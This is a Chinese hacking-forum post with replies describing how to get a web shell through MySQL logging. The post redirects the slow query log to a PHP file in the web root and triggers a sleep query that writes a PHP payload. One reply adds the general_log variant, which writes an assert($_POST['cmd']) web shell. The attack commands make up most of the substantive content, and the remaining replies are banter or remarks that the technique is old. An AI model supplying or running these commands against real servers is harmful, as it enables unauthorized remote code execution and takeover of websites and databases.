MySql慢查询日志GetShell

2019-07-27 13:06:39 32 10569 4
通过开启慢查询日志,配置可解析文件GETSHELL
主要针对日志量庞大,通过日志文件GETSHELL出现问题的情况
show variables like '%slow%';

Variable_name         Value
log_slow_queries         OFF
slow_launch_time         2
slow_query_log         OFF
slow_query_log_file         C:\phpStudy\PHPTutorial\MySQL\data\WIN-374NAWYudt-slow.log


set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
set GLOBAL slow_query_log=on;

/*set GLOBAL log_queries_not_using_indexes=on;
show variables like '%log%';*/

select '<?php phpinfo();?>' from mysql.db where sleep(10);

关于作者

键盘手23篇文章232篇回复

评论32次

要评论?请先  登录  或  注册
  • TOP1
    2019-7-27 15:11

    MySQL的慢查询日志是MySQL提供的一种日志记录,它用来记录在MySQL中响应时间超过阀值的语句,long_query_time的默认值为10,意思是运行10S以上的语句。该值可以指定为微秒的分辨率。具体指运行时间超过long_query_time值的SQL,则会被记录到慢查询日志中。对日志量庞大,通过日志文件GETSHELL确实是一种帮助. mark

  • TOP2
    2019-7-27 16:48

    告诉大家个好消息,北京申奥成功了

  • 12楼
    2019-7-27 22:55

    楼主不都说了主要针对日志量大,通过日志getshell出现问题的时候 可以试试这个嘛

  • 11楼
    2019-7-27 20:48
    root_iceH

    告诉大家个好消息,北京申奥成功了

    1

    2002年 国足出线了吗

  • 10楼
    2019-7-27 20:42

    跟以前有多大区别???

  • 9楼
    2019-7-27 17:45

    set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>';
    跟以前那个代码不一样的啊好吧
    set GLOBAL slow_query_log=on; set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php'; /*set GLOBAL log_queries_not_using_indexes=on; show variables like '%log%';*/ select '<?php phpinfo();?>' from mysql.db where sleep(10);

  • 8楼
    2019-7-27 16:48

    告诉大家个好消息,北京申奥成功了

  • 7楼
    2019-7-27 16:39

    这个之前好像 phpmyadmin拿shell就提到过

  • 6楼
    2019-7-27 16:26

    楼主刚睡醒。

  • 5楼
    2019-7-27 16:08

    mysql 日志文件getshell。。。 这个很早就有了

  • 4楼
    2019-7-27 15:11

    MySQL的慢查询日志是MySQL提供的一种日志记录,它用来记录在MySQL中响应时间超过阀值的语句, long_query_time的默认值为10,意思是运行10S以上的语句。该值可以指定为微秒的分辨率。 具体指运行时间超过long_query_time值的SQL,则会被记录到慢查询日志中。 对日志量庞大,通过日志文件GETSHELL确实是一种帮助. mark

  • 3楼
    2019-7-27 14:51

    查询操作会写入日志文件,即一句话木马会写进日志文件。网上都大把类似的文章。

  • 2楼
    2019-7-27 14:29

    这种类似的手法有很多的

  • 1楼
    2019-7-27 14:02

    你是才学会这个技巧?还是你搜了搜历史贴又发了一遍?